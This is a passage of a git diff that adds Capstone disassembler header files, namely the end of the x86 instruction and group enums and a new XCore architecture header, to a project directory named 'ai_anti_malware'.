X86_INS_VFNMADD132PD, + X86_INS_VFNMADD132PS, + X86_INS_VFNMADDPD, + X86_INS_VFNMADD213PD, + X86_INS_VFNMADD231PD, + X86_INS_VFNMADDPS, + X86_INS_VFNMADD213PS, + X86_INS_VFNMADD231PS, + X86_INS_VFNMADDSD, + X86_INS_VFNMADD213SD, + X86_INS_VFNMADD132SD, + X86_INS_VFNMADD231SD, + X86_INS_VFNMADDSS, + X86_INS_VFNMADD213SS, + X86_INS_VFNMADD132SS, + X86_INS_VFNMADD231SS, + X86_INS_VFNMSUB132PD, + X86_INS_VFNMSUB132PS, + X86_INS_VFNMSUBPD, + X86_INS_VFNMSUB213PD, + X86_INS_VFNMSUB231PD, + X86_INS_VFNMSUBPS, + X86_INS_VFNMSUB213PS, + X86_INS_VFNMSUB231PS, + X86_INS_VFNMSUBSD, + X86_INS_VFNMSUB213SD, + X86_INS_VFNMSUB132SD, + X86_INS_VFNMSUB231SD, + X86_INS_VFNMSUBSS, + X86_INS_VFNMSUB213SS, + X86_INS_VFNMSUB132SS, + X86_INS_VFNMSUB231SS, + X86_INS_VFRCZPD, + X86_INS_VFRCZPS, + X86_INS_VFRCZSD, + X86_INS_VFRCZSS, + X86_INS_VORPD, + X86_INS_VORPS, + X86_INS_VXORPD, + X86_INS_VXORPS, + X86_INS_VGATHERDPD, + X86_INS_VGATHERDPS, + X86_INS_VGATHERPF0DPD, + X86_INS_VGATHERPF0DPS, + X86_INS_VGATHERPF0QPD, + X86_INS_VGATHERPF0QPS, + X86_INS_VGATHERPF1DPD, + X86_INS_VGATHERPF1DPS, + X86_INS_VGATHERPF1QPD, + X86_INS_VGATHERPF1QPS, + X86_INS_VGATHERQPD, + X86_INS_VGATHERQPS, + X86_INS_VHADDPD, + X86_INS_VHADDPS, + X86_INS_VHSUBPD, + X86_INS_VHSUBPS, + X86_INS_VINSERTF128, + X86_INS_VINSERTF32X4, + X86_INS_VINSERTF32X8, + X86_INS_VINSERTF64X2, + X86_INS_VINSERTF64X4, + X86_INS_VINSERTI128, + X86_INS_VINSERTI32X4, + X86_INS_VINSERTI32X8, + X86_INS_VINSERTI64X2, + X86_INS_VINSERTI64X4, + X86_INS_VINSERTPS, + X86_INS_VLDDQU, + X86_INS_VLDMXCSR, + X86_INS_VMASKMOVDQU, + X86_INS_VMASKMOVPD, + X86_INS_VMASKMOVPS, + X86_INS_VMAXPD, + X86_INS_VMAXPS, + X86_INS_VMAXSD, + X86_INS_VMAXSS, + X86_INS_VMCALL, + X86_INS_VMCLEAR, + X86_INS_VMFUNC, + X86_INS_VMINPD, + X86_INS_VMINPS, + X86_INS_VMINSD, + X86_INS_VMINSS, + X86_INS_VMLAUNCH, + X86_INS_VMLOAD, + X86_INS_VMMCALL, + X86_INS_VMOVQ, + X86_INS_VMOVDDUP, + X86_INS_VMOVD, + X86_INS_VMOVDQA32, + X86_INS_VMOVDQA64, + X86_INS_VMOVDQA, + X86_INS_VMOVDQU16, + X86_INS_VMOVDQU32, + X86_INS_VMOVDQU64, + X86_INS_VMOVDQU8, + X86_INS_VMOVDQU, + X86_INS_VMOVHLPS, + X86_INS_VMOVHPD, + X86_INS_VMOVHPS, + X86_INS_VMOVLHPS, + X86_INS_VMOVLPD, + X86_INS_VMOVLPS, + X86_INS_VMOVMSKPD, + X86_INS_VMOVMSKPS, + X86_INS_VMOVNTDQA, + X86_INS_VMOVNTDQ, + X86_INS_VMOVNTPD, + X86_INS_VMOVNTPS, + X86_INS_VMOVSD, + X86_INS_VMOVSHDUP, + X86_INS_VMOVSLDUP, + X86_INS_VMOVSS, + X86_INS_VMOVUPD, + X86_INS_VMOVUPS, + X86_INS_VMPSADBW, + X86_INS_VMPTRLD, + X86_INS_VMPTRST, + X86_INS_VMREAD, + X86_INS_VMRESUME, + X86_INS_VMRUN, + X86_INS_VMSAVE, + X86_INS_VMULPD, + X86_INS_VMULPS, + X86_INS_VMULSD, + X86_INS_VMULSS, + X86_INS_VMWRITE, + X86_INS_VMXOFF, + X86_INS_VMXON, + X86_INS_VPABSB, + X86_INS_VPABSD, + X86_INS_VPABSQ, + X86_INS_VPABSW, + X86_INS_VPACKSSDW, + X86_INS_VPACKSSWB, + X86_INS_VPACKUSDW, + X86_INS_VPACKUSWB, + X86_INS_VPADDB, + X86_INS_VPADDD, + X86_INS_VPADDQ, + X86_INS_VPADDSB, + X86_INS_VPADDSW, + X86_INS_VPADDUSB, + X86_INS_VPADDUSW, + X86_INS_VPADDW, + X86_INS_VPALIGNR, + X86_INS_VPANDD, + X86_INS_VPANDND, + X86_INS_VPANDNQ, + X86_INS_VPANDN, + X86_INS_VPANDQ, + X86_INS_VPAND, + X86_INS_VPAVGB, + X86_INS_VPAVGW, + X86_INS_VPBLENDD, + X86_INS_VPBLENDMB, + X86_INS_VPBLENDMD, + X86_INS_VPBLENDMQ, + X86_INS_VPBLENDMW, + X86_INS_VPBLENDVB, + X86_INS_VPBLENDW, + X86_INS_VPBROADCASTB, + X86_INS_VPBROADCASTD, + X86_INS_VPBROADCASTMB2Q, + X86_INS_VPBROADCASTMW2D, + X86_INS_VPBROADCASTQ, + X86_INS_VPBROADCASTW, + X86_INS_VPCLMULQDQ, + X86_INS_VPCMOV, + X86_INS_VPCMPB, + X86_INS_VPCMPD, + X86_INS_VPCMPEQB, + X86_INS_VPCMPEQD, + X86_INS_VPCMPEQQ, + X86_INS_VPCMPEQW, + X86_INS_VPCMPESTRI, + X86_INS_VPCMPESTRM, + X86_INS_VPCMPGTB, + X86_INS_VPCMPGTD, + X86_INS_VPCMPGTQ, + X86_INS_VPCMPGTW, + X86_INS_VPCMPISTRI, + X86_INS_VPCMPISTRM, + X86_INS_VPCMPQ, + X86_INS_VPCMPUB, + X86_INS_VPCMPUD, + X86_INS_VPCMPUQ, + X86_INS_VPCMPUW, + X86_INS_VPCMPW, + X86_INS_VPCOMB, + X86_INS_VPCOMD, + X86_INS_VPCOMPRESSD, + X86_INS_VPCOMPRESSQ, + X86_INS_VPCOMQ, + X86_INS_VPCOMUB, + X86_INS_VPCOMUD, + X86_INS_VPCOMUQ, + X86_INS_VPCOMUW, + X86_INS_VPCOMW, + X86_INS_VPCONFLICTD, + X86_INS_VPCONFLICTQ, + X86_INS_VPERM2F128, + X86_INS_VPERM2I128, + X86_INS_VPERMD, + X86_INS_VPERMI2D, + X86_INS_VPERMI2PD, + X86_INS_VPERMI2PS, + X86_INS_VPERMI2Q, + X86_INS_VPERMIL2PD, + X86_INS_VPERMIL2PS, + X86_INS_VPERMILPD, + X86_INS_VPERMILPS, + X86_INS_VPERMPD, + X86_INS_VPERMPS, + X86_INS_VPERMQ, + X86_INS_VPERMT2D, + X86_INS_VPERMT2PD, + X86_INS_VPERMT2PS, + X86_INS_VPERMT2Q, + X86_INS_VPEXPANDD, + X86_INS_VPEXPANDQ, + X86_INS_VPEXTRB, + X86_INS_VPEXTRD, + X86_INS_VPEXTRQ, + X86_INS_VPEXTRW, + X86_INS_VPGATHERDD, + X86_INS_VPGATHERDQ, + X86_INS_VPGATHERQD, + X86_INS_VPGATHERQQ, + X86_INS_VPHADDBD, + X86_INS_VPHADDBQ, + X86_INS_VPHADDBW, + X86_INS_VPHADDDQ, + X86_INS_VPHADDD, + X86_INS_VPHADDSW, + X86_INS_VPHADDUBD, + X86_INS_VPHADDUBQ, + X86_INS_VPHADDUBW, + X86_INS_VPHADDUDQ, + X86_INS_VPHADDUWD, + X86_INS_VPHADDUWQ, + X86_INS_VPHADDWD, + X86_INS_VPHADDWQ, + X86_INS_VPHADDW, + X86_INS_VPHMINPOSUW, + X86_INS_VPHSUBBW, + X86_INS_VPHSUBDQ, + X86_INS_VPHSUBD, + X86_INS_VPHSUBSW, + X86_INS_VPHSUBWD, + X86_INS_VPHSUBW, + X86_INS_VPINSRB, + X86_INS_VPINSRD, + X86_INS_VPINSRQ, + X86_INS_VPINSRW, + X86_INS_VPLZCNTD, + X86_INS_VPLZCNTQ, + X86_INS_VPMACSDD, + X86_INS_VPMACSDQH, + X86_INS_VPMACSDQL, + X86_INS_VPMACSSDD, + X86_INS_VPMACSSDQH, + X86_INS_VPMACSSDQL, + X86_INS_VPMACSSWD, + X86_INS_VPMACSSWW, + X86_INS_VPMACSWD, + X86_INS_VPMACSWW, + X86_INS_VPMADCSSWD, + X86_INS_VPMADCSWD, + X86_INS_VPMADDUBSW, + X86_INS_VPMADDWD, + X86_INS_VPMASKMOVD, + X86_INS_VPMASKMOVQ, + X86_INS_VPMAXSB, + X86_INS_VPMAXSD, + X86_INS_VPMAXSQ, + X86_INS_VPMAXSW, + X86_INS_VPMAXUB, + X86_INS_VPMAXUD, + X86_INS_VPMAXUQ, + X86_INS_VPMAXUW, + X86_INS_VPMINSB, + X86_INS_VPMINSD, + X86_INS_VPMINSQ, + X86_INS_VPMINSW, + X86_INS_VPMINUB, + X86_INS_VPMINUD, + X86_INS_VPMINUQ, + X86_INS_VPMINUW, + X86_INS_VPMOVDB, + X86_INS_VPMOVDW, + X86_INS_VPMOVM2B, + X86_INS_VPMOVM2D, + X86_INS_VPMOVM2Q, + X86_INS_VPMOVM2W, + X86_INS_VPMOVMSKB, + X86_INS_VPMOVQB, + X86_INS_VPMOVQD, + X86_INS_VPMOVQW, + X86_INS_VPMOVSDB, + X86_INS_VPMOVSDW, + X86_INS_VPMOVSQB, + X86_INS_VPMOVSQD, + X86_INS_VPMOVSQW, + X86_INS_VPMOVSXBD, + X86_INS_VPMOVSXBQ, + X86_INS_VPMOVSXBW, + X86_INS_VPMOVSXDQ, + X86_INS_VPMOVSXWD, + X86_INS_VPMOVSXWQ, + X86_INS_VPMOVUSDB, + X86_INS_VPMOVUSDW, + X86_INS_VPMOVUSQB, + X86_INS_VPMOVUSQD, + X86_INS_VPMOVUSQW, + X86_INS_VPMOVZXBD, + X86_INS_VPMOVZXBQ, + X86_INS_VPMOVZXBW, + X86_INS_VPMOVZXDQ, + X86_INS_VPMOVZXWD, + X86_INS_VPMOVZXWQ, + X86_INS_VPMULDQ, + X86_INS_VPMULHRSW, + X86_INS_VPMULHUW, + X86_INS_VPMULHW, + X86_INS_VPMULLD, + X86_INS_VPMULLQ, + X86_INS_VPMULLW, + X86_INS_VPMULUDQ, + X86_INS_VPORD, + X86_INS_VPORQ, + X86_INS_VPOR, + X86_INS_VPPERM, + X86_INS_VPROTB, + X86_INS_VPROTD, + X86_INS_VPROTQ, + X86_INS_VPROTW, + X86_INS_VPSADBW, + X86_INS_VPSCATTERDD, + X86_INS_VPSCATTERDQ, + X86_INS_VPSCATTERQD, + X86_INS_VPSCATTERQQ, + X86_INS_VPSHAB, + X86_INS_VPSHAD, + X86_INS_VPSHAQ, + X86_INS_VPSHAW, + X86_INS_VPSHLB, + X86_INS_VPSHLD, + X86_INS_VPSHLQ, + X86_INS_VPSHLW, + X86_INS_VPSHUFB, + X86_INS_VPSHUFD, + X86_INS_VPSHUFHW, + X86_INS_VPSHUFLW, + X86_INS_VPSIGNB, + X86_INS_VPSIGND, + X86_INS_VPSIGNW, + X86_INS_VPSLLDQ, + X86_INS_VPSLLD, + X86_INS_VPSLLQ, + X86_INS_VPSLLVD, + X86_INS_VPSLLVQ, + X86_INS_VPSLLW, + X86_INS_VPSRAD, + X86_INS_VPSRAQ, + X86_INS_VPSRAVD, + X86_INS_VPSRAVQ, + X86_INS_VPSRAW, + X86_INS_VPSRLDQ, + X86_INS_VPSRLD, + X86_INS_VPSRLQ, + X86_INS_VPSRLVD, + X86_INS_VPSRLVQ, + X86_INS_VPSRLW, + X86_INS_VPSUBB, + X86_INS_VPSUBD, + X86_INS_VPSUBQ, + X86_INS_VPSUBSB, + X86_INS_VPSUBSW, + X86_INS_VPSUBUSB, + X86_INS_VPSUBUSW, + X86_INS_VPSUBW, + X86_INS_VPTESTMD, + X86_INS_VPTESTMQ, + X86_INS_VPTESTNMD, + X86_INS_VPTESTNMQ, + X86_INS_VPTEST, + X86_INS_VPUNPCKHBW, + X86_INS_VPUNPCKHDQ, + X86_INS_VPUNPCKHQDQ, + X86_INS_VPUNPCKHWD, + X86_INS_VPUNPCKLBW, + X86_INS_VPUNPCKLDQ, + X86_INS_VPUNPCKLQDQ, + X86_INS_VPUNPCKLWD, + X86_INS_VPXORD, + X86_INS_VPXORQ, + X86_INS_VPXOR, + X86_INS_VRCP14PD, + X86_INS_VRCP14PS, + X86_INS_VRCP14SD, + X86_INS_VRCP14SS, + X86_INS_VRCP28PD, + X86_INS_VRCP28PS, + X86_INS_VRCP28SD, + X86_INS_VRCP28SS, + X86_INS_VRCPPS, + X86_INS_VRCPSS, + X86_INS_VRNDSCALEPD, + X86_INS_VRNDSCALEPS, + X86_INS_VRNDSCALESD, + X86_INS_VRNDSCALESS, + X86_INS_VROUNDPD, + X86_INS_VROUNDPS, + X86_INS_VROUNDSD, + X86_INS_VROUNDSS, + X86_INS_VRSQRT14PD, + X86_INS_VRSQRT14PS, + X86_INS_VRSQRT14SD, + X86_INS_VRSQRT14SS, + X86_INS_VRSQRT28PD, + X86_INS_VRSQRT28PS, + X86_INS_VRSQRT28SD, + X86_INS_VRSQRT28SS, + X86_INS_VRSQRTPS, + X86_INS_VRSQRTSS, + X86_INS_VSCATTERDPD, + X86_INS_VSCATTERDPS, + X86_INS_VSCATTERPF0DPD, + X86_INS_VSCATTERPF0DPS, + X86_INS_VSCATTERPF0QPD, + X86_INS_VSCATTERPF0QPS, + X86_INS_VSCATTERPF1DPD, + X86_INS_VSCATTERPF1DPS, + X86_INS_VSCATTERPF1QPD, + X86_INS_VSCATTERPF1QPS, + X86_INS_VSCATTERQPD, + X86_INS_VSCATTERQPS, + X86_INS_VSHUFPD, + X86_INS_VSHUFPS, + X86_INS_VSQRTPD, + X86_INS_VSQRTPS, + X86_INS_VSQRTSD, + X86_INS_VSQRTSS, + X86_INS_VSTMXCSR, + X86_INS_VSUBPD, + X86_INS_VSUBPS, + X86_INS_VSUBSD, + X86_INS_VSUBSS, + X86_INS_VTESTPD, + X86_INS_VTESTPS, + X86_INS_VUNPCKHPD, + X86_INS_VUNPCKHPS, + X86_INS_VUNPCKLPD, + X86_INS_VUNPCKLPS, + X86_INS_VZEROALL, + X86_INS_VZEROUPPER, + X86_INS_WAIT, + X86_INS_WBINVD, + X86_INS_WRFSBASE, + X86_INS_WRGSBASE, + X86_INS_WRMSR, + X86_INS_XABORT, + X86_INS_XACQUIRE, + X86_INS_XBEGIN, + X86_INS_XCHG, + X86_INS_XCRYPTCBC, + X86_INS_XCRYPTCFB, + X86_INS_XCRYPTCTR, + X86_INS_XCRYPTECB, + X86_INS_XCRYPTOFB, + X86_INS_XEND, + X86_INS_XGETBV, + X86_INS_XLATB, + X86_INS_XRELEASE, + X86_INS_XRSTOR, + X86_INS_XRSTOR64, + X86_INS_XRSTORS, + X86_INS_XRSTORS64, + X86_INS_XSAVE, + X86_INS_XSAVE64, + X86_INS_XSAVEC, + X86_INS_XSAVEC64, + X86_INS_XSAVEOPT, + X86_INS_XSAVEOPT64, + X86_INS_XSAVES, + X86_INS_XSAVES64, + X86_INS_XSETBV, + X86_INS_XSHA1, + X86_INS_XSHA256, + X86_INS_XSTORE, + X86_INS_XTEST, + X86_INS_FDISI8087_NOP, + X86_INS_FENI8087_NOP, + + // pseudo instructions + X86_INS_CMPSS, + X86_INS_CMPEQSS, + X86_INS_CMPLTSS, + X86_INS_CMPLESS, + X86_INS_CMPUNORDSS, + X86_INS_CMPNEQSS, + X86_INS_CMPNLTSS, + X86_INS_CMPNLESS, + X86_INS_CMPORDSS, + + X86_INS_CMPSD, + X86_INS_CMPEQSD, + X86_INS_CMPLTSD, + X86_INS_CMPLESD, + X86_INS_CMPUNORDSD, + X86_INS_CMPNEQSD, + X86_INS_CMPNLTSD, + X86_INS_CMPNLESD, + X86_INS_CMPORDSD, + + X86_INS_CMPPS, + X86_INS_CMPEQPS, + X86_INS_CMPLTPS, + X86_INS_CMPLEPS, + X86_INS_CMPUNORDPS, + X86_INS_CMPNEQPS, + X86_INS_CMPNLTPS, + X86_INS_CMPNLEPS, + X86_INS_CMPORDPS, + + X86_INS_CMPPD, + X86_INS_CMPEQPD, + X86_INS_CMPLTPD, + X86_INS_CMPLEPD, + X86_INS_CMPUNORDPD, + X86_INS_CMPNEQPD, + X86_INS_CMPNLTPD, + X86_INS_CMPNLEPD, + X86_INS_CMPORDPD, + + X86_INS_VCMPSS, + X86_INS_VCMPEQSS, + X86_INS_VCMPLTSS, + X86_INS_VCMPLESS, + X86_INS_VCMPUNORDSS, + X86_INS_VCMPNEQSS, + X86_INS_VCMPNLTSS, + X86_INS_VCMPNLESS, + X86_INS_VCMPORDSS, + X86_INS_VCMPEQ_UQSS, + X86_INS_VCMPNGESS, + X86_INS_VCMPNGTSS, + X86_INS_VCMPFALSESS, + X86_INS_VCMPNEQ_OQSS, + X86_INS_VCMPGESS, + X86_INS_VCMPGTSS, + X86_INS_VCMPTRUESS, + X86_INS_VCMPEQ_OSSS, + X86_INS_VCMPLT_OQSS, + X86_INS_VCMPLE_OQSS, + X86_INS_VCMPUNORD_SSS, + X86_INS_VCMPNEQ_USSS, + X86_INS_VCMPNLT_UQSS, + X86_INS_VCMPNLE_UQSS, + X86_INS_VCMPORD_SSS, + X86_INS_VCMPEQ_USSS, + X86_INS_VCMPNGE_UQSS, + X86_INS_VCMPNGT_UQSS, + X86_INS_VCMPFALSE_OSSS, + X86_INS_VCMPNEQ_OSSS, + X86_INS_VCMPGE_OQSS, + X86_INS_VCMPGT_OQSS, + X86_INS_VCMPTRUE_USSS, + + X86_INS_VCMPSD, + X86_INS_VCMPEQSD, + X86_INS_VCMPLTSD, + X86_INS_VCMPLESD, + X86_INS_VCMPUNORDSD, + X86_INS_VCMPNEQSD, + X86_INS_VCMPNLTSD, + X86_INS_VCMPNLESD, + X86_INS_VCMPORDSD, + X86_INS_VCMPEQ_UQSD, + X86_INS_VCMPNGESD, + X86_INS_VCMPNGTSD, + X86_INS_VCMPFALSESD, + X86_INS_VCMPNEQ_OQSD, + X86_INS_VCMPGESD, + X86_INS_VCMPGTSD, + X86_INS_VCMPTRUESD, + X86_INS_VCMPEQ_OSSD, + X86_INS_VCMPLT_OQSD, + X86_INS_VCMPLE_OQSD, + X86_INS_VCMPUNORD_SSD, + X86_INS_VCMPNEQ_USSD, + X86_INS_VCMPNLT_UQSD, + X86_INS_VCMPNLE_UQSD, + X86_INS_VCMPORD_SSD, + X86_INS_VCMPEQ_USSD, + X86_INS_VCMPNGE_UQSD, + X86_INS_VCMPNGT_UQSD, + X86_INS_VCMPFALSE_OSSD, + X86_INS_VCMPNEQ_OSSD, + X86_INS_VCMPGE_OQSD, + X86_INS_VCMPGT_OQSD, + X86_INS_VCMPTRUE_USSD, + + X86_INS_VCMPPS, + X86_INS_VCMPEQPS, + X86_INS_VCMPLTPS, + X86_INS_VCMPLEPS, + X86_INS_VCMPUNORDPS, + X86_INS_VCMPNEQPS, + X86_INS_VCMPNLTPS, + X86_INS_VCMPNLEPS, + X86_INS_VCMPORDPS, + X86_INS_VCMPEQ_UQPS, + X86_INS_VCMPNGEPS, + X86_INS_VCMPNGTPS, + X86_INS_VCMPFALSEPS, + X86_INS_VCMPNEQ_OQPS, + X86_INS_VCMPGEPS, + X86_INS_VCMPGTPS, + X86_INS_VCMPTRUEPS, + X86_INS_VCMPEQ_OSPS, + X86_INS_VCMPLT_OQPS, + X86_INS_VCMPLE_OQPS, + X86_INS_VCMPUNORD_SPS, + X86_INS_VCMPNEQ_USPS, + X86_INS_VCMPNLT_UQPS, + X86_INS_VCMPNLE_UQPS, + X86_INS_VCMPORD_SPS, + X86_INS_VCMPEQ_USPS, + X86_INS_VCMPNGE_UQPS, + X86_INS_VCMPNGT_UQPS, + X86_INS_VCMPFALSE_OSPS, + X86_INS_VCMPNEQ_OSPS, + X86_INS_VCMPGE_OQPS, + X86_INS_VCMPGT_OQPS, + X86_INS_VCMPTRUE_USPS, + + X86_INS_VCMPPD, + X86_INS_VCMPEQPD, + X86_INS_VCMPLTPD, + X86_INS_VCMPLEPD, + X86_INS_VCMPUNORDPD, + X86_INS_VCMPNEQPD, + X86_INS_VCMPNLTPD, + X86_INS_VCMPNLEPD, + X86_INS_VCMPORDPD, + X86_INS_VCMPEQ_UQPD, + X86_INS_VCMPNGEPD, + X86_INS_VCMPNGTPD, + X86_INS_VCMPFALSEPD, + X86_INS_VCMPNEQ_OQPD, + X86_INS_VCMPGEPD, + X86_INS_VCMPGTPD, + X86_INS_VCMPTRUEPD, + X86_INS_VCMPEQ_OSPD, + X86_INS_VCMPLT_OQPD, + X86_INS_VCMPLE_OQPD, + X86_INS_VCMPUNORD_SPD, + X86_INS_VCMPNEQ_USPD, + X86_INS_VCMPNLT_UQPD, + X86_INS_VCMPNLE_UQPD, + X86_INS_VCMPORD_SPD, + X86_INS_VCMPEQ_USPD, + X86_INS_VCMPNGE_UQPD, + X86_INS_VCMPNGT_UQPD, + X86_INS_VCMPFALSE_OSPD, + X86_INS_VCMPNEQ_OSPD, + X86_INS_VCMPGE_OQPD, + X86_INS_VCMPGT_OQPD, + X86_INS_VCMPTRUE_USPD, + + X86_INS_UD0, + X86_INS_ENDBR32, + X86_INS_ENDBR64, + + X86_INS_ENDING, // mark the end of the list of insn +} x86_insn; + +/// Group of X86 instructions +typedef enum x86_insn_group { + X86_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + X86_GRP_JUMP, ///< = CS_GRP_JUMP + // all call instructions + X86_GRP_CALL, ///< = CS_GRP_CALL + // all return instructions + X86_GRP_RET, ///< = CS_GRP_RET + // all interrupt instructions (int+syscall) + X86_GRP_INT, ///< = CS_GRP_INT + // all interrupt return instructions + X86_GRP_IRET, ///< = CS_GRP_IRET + // all privileged instructions + X86_GRP_PRIVILEGE, ///< = CS_GRP_PRIVILEGE + // all relative branching instructions + X86_GRP_BRANCH_RELATIVE, ///< = CS_GRP_BRANCH_RELATIVE + + // Architecture-specific groups + X86_GRP_VM = 128, ///< all virtualization instructions (VT-x + AMD-V) + X86_GRP_3DNOW, + X86_GRP_AES, + X86_GRP_ADX, + X86_GRP_AVX, + X86_GRP_AVX2, + X86_GRP_AVX512, + X86_GRP_BMI, + X86_GRP_BMI2, + X86_GRP_CMOV, + X86_GRP_F16C, + X86_GRP_FMA, + X86_GRP_FMA4, + X86_GRP_FSGSBASE, + X86_GRP_HLE, + X86_GRP_MMX, + X86_GRP_MODE32, + X86_GRP_MODE64, + X86_GRP_RTM, + X86_GRP_SHA, + X86_GRP_SSE1, + X86_GRP_SSE2, + X86_GRP_SSE3, + X86_GRP_SSE41, + X86_GRP_SSE42, + X86_GRP_SSE4A, + X86_GRP_SSSE3, + X86_GRP_PCLMUL, + X86_GRP_XOP, + X86_GRP_CDI, + X86_GRP_ERI, + X86_GRP_TBM, + X86_GRP_16BITMODE, + X86_GRP_NOT64BITMODE, + X86_GRP_SGX, + X86_GRP_DQI, + X86_GRP_BWI, + X86_GRP_PFI, + X86_GRP_VLX, + X86_GRP_SMAP, + X86_GRP_NOVLX, + X86_GRP_FPU, + + X86_GRP_ENDING +} x86_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/xcore.h b/ai_anti_malware/capstone/include/capstone/xcore.h new file mode 100644 index 0000000..6db1f24 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/xcore.h @@ -0,0 +1,235 @@ +#ifndef CAPSTONE_XCORE_H +#define CAPSTONE_XCORE_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2014-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Operand type for instruction's operands +typedef enum xcore_op_type { + XCORE_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + XCORE_OP_REG, ///< = CS_OP_REG (Register operand). + XCORE_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + XCORE_OP_MEM, ///< = CS_OP_MEM (Memory operand). +} xcore_op_type; + +/// XCore registers +typedef enum xcore_reg { + XCORE_REG_INVALID = 0, + + XCORE_REG_CP, + XCORE_REG_DP, + XCORE_REG_LR, + XCORE_REG_SP, + XCORE_REG_R0, + XCORE_REG_R1, + XCORE_REG_R2, + XCORE_REG_R3, + XCORE_REG_R4, + XCORE_REG_R5, + XCORE_REG_R6, + XCORE_REG_R7, + XCORE_REG_R8, + XCORE_REG_R9, + XCORE_REG_R10, + XCORE_REG_R11, + + // pseudo registers + XCORE_REG_PC, ///< pc + + // internal thread registers + // see The-XMOS-XS1-Architecture(X7879A).pdf + XCORE_REG_SCP, ///< save pc + XCORE_REG_SSR, //< save status + XCORE_REG_ET, //< exception type + XCORE_REG_ED, //< exception data + XCORE_REG_SED, //< save exception data + XCORE_REG_KEP, //< kernel entry pointer + XCORE_REG_KSP, //< kernel stack pointer + XCORE_REG_ID, //< thread ID + + XCORE_REG_ENDING, // <-- mark the end of the list of registers +} xcore_reg; + +/// Instruction's operand referring to memory +/// This is associated with XCORE_OP_MEM operand type above +typedef struct xcore_op_mem { + uint8_t base; ///< base register, can be safely interpreted as + ///< a value of type `xcore_reg`, but it is only + ///< one byte wide + uint8_t index; ///< index register, same conditions apply here + int32_t disp; ///< displacement/offset value + int direct; ///< +1: forward, -1: backward +} xcore_op_mem; + +/// Instruction operand +typedef struct cs_xcore_op { + xcore_op_type type; ///< operand type + union { + xcore_reg reg; ///< register value for REG operand + int32_t imm; ///< immediate value for IMM operand + xcore_op_mem mem; ///< base/disp value for MEM operand + }; +} cs_xcore_op; + +/// Instruction structure +typedef struct cs_xcore { + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_xcore_op operands[8]; ///< operands for this instruction. +} cs_xcore; + +/// XCore instruction +typedef enum xcore_insn { + XCORE_INS_INVALID = 0, + + XCORE_INS_ADD, + XCORE_INS_ANDNOT, + XCORE_INS_AND, + XCORE_INS_ASHR, + XCORE_INS_BAU, + XCORE_INS_BITREV, + XCORE_INS_BLA, + XCORE_INS_BLAT, + XCORE_INS_BL, + XCORE_INS_BF, + XCORE_INS_BT, + XCORE_INS_BU, + XCORE_INS_BRU, + XCORE_INS_BYTEREV, + XCORE_INS_CHKCT, + XCORE_INS_CLRE, + XCORE_INS_CLRPT, + XCORE_INS_CLRSR, + XCORE_INS_CLZ, + XCORE_INS_CRC8, + XCORE_INS_CRC32, + XCORE_INS_DCALL, + XCORE_INS_DENTSP, + XCORE_INS_DGETREG, + XCORE_INS_DIVS, + XCORE_INS_DIVU, + XCORE_INS_DRESTSP, + XCORE_INS_DRET, + XCORE_INS_ECALLF, + XCORE_INS_ECALLT, + XCORE_INS_EDU, + XCORE_INS_EEF, + XCORE_INS_EET, + XCORE_INS_EEU, + XCORE_INS_ENDIN, + XCORE_INS_ENTSP, + XCORE_INS_EQ, + XCORE_INS_EXTDP, + XCORE_INS_EXTSP, + XCORE_INS_FREER, + XCORE_INS_FREET, + XCORE_INS_GETD, + XCORE_INS_GET, + XCORE_INS_GETN, + XCORE_INS_GETR, + XCORE_INS_GETSR, + XCORE_INS_GETST, + XCORE_INS_GETTS, + XCORE_INS_INCT, + XCORE_INS_INIT, + XCORE_INS_INPW, + XCORE_INS_INSHR, + XCORE_INS_INT, + XCORE_INS_IN, + XCORE_INS_KCALL, + XCORE_INS_KENTSP, + XCORE_INS_KRESTSP, + XCORE_INS_KRET, + XCORE_INS_LADD, + XCORE_INS_LD16S, + XCORE_INS_LD8U, + XCORE_INS_LDA16, + XCORE_INS_LDAP, + XCORE_INS_LDAW, + XCORE_INS_LDC, + XCORE_INS_LDW, + XCORE_INS_LDIVU, + XCORE_INS_LMUL, + XCORE_INS_LSS, + XCORE_INS_LSUB, + XCORE_INS_LSU, + XCORE_INS_MACCS, + XCORE_INS_MACCU, + XCORE_INS_MJOIN, + XCORE_INS_MKMSK, + XCORE_INS_MSYNC, + XCORE_INS_MUL, + XCORE_INS_NEG, + XCORE_INS_NOT, + XCORE_INS_OR, + XCORE_INS_OUTCT, + XCORE_INS_OUTPW, + XCORE_INS_OUTSHR, + XCORE_INS_OUTT, + XCORE_INS_OUT, + XCORE_INS_PEEK, + XCORE_INS_REMS, + XCORE_INS_REMU, + XCORE_INS_RETSP, + XCORE_INS_SETCLK, + XCORE_INS_SET, + XCORE_INS_SETC, + XCORE_INS_SETD, + XCORE_INS_SETEV, + XCORE_INS_SETN, + XCORE_INS_SETPSC, + XCORE_INS_SETPT, + XCORE_INS_SETRDY, + XCORE_INS_SETSR, + XCORE_INS_SETTW, + XCORE_INS_SETV, + XCORE_INS_SEXT, + XCORE_INS_SHL, + XCORE_INS_SHR, + XCORE_INS_SSYNC, + XCORE_INS_ST16, + XCORE_INS_ST8, + XCORE_INS_STW, + XCORE_INS_SUB, + XCORE_INS_SYNCR, + XCORE_INS_TESTCT, + XCORE_INS_TESTLCL, + XCORE_INS_TESTWCT, + XCORE_INS_TSETMR, + XCORE_INS_START, + XCORE_INS_WAITEF, + XCORE_INS_WAITET, + XCORE_INS_WAITEU, + XCORE_INS_XOR, + XCORE_INS_ZEXT, + + XCORE_INS_ENDING, // <-- mark the end of the list of instructions +} xcore_insn; + +/// Group of XCore instructions +typedef enum xcore_insn_group { + XCORE_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + XCORE_GRP_JUMP, ///< = CS_GRP_JUMP + + XCORE_GRP_ENDING, // <-- mark the end of the list of groups +} xcore_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git 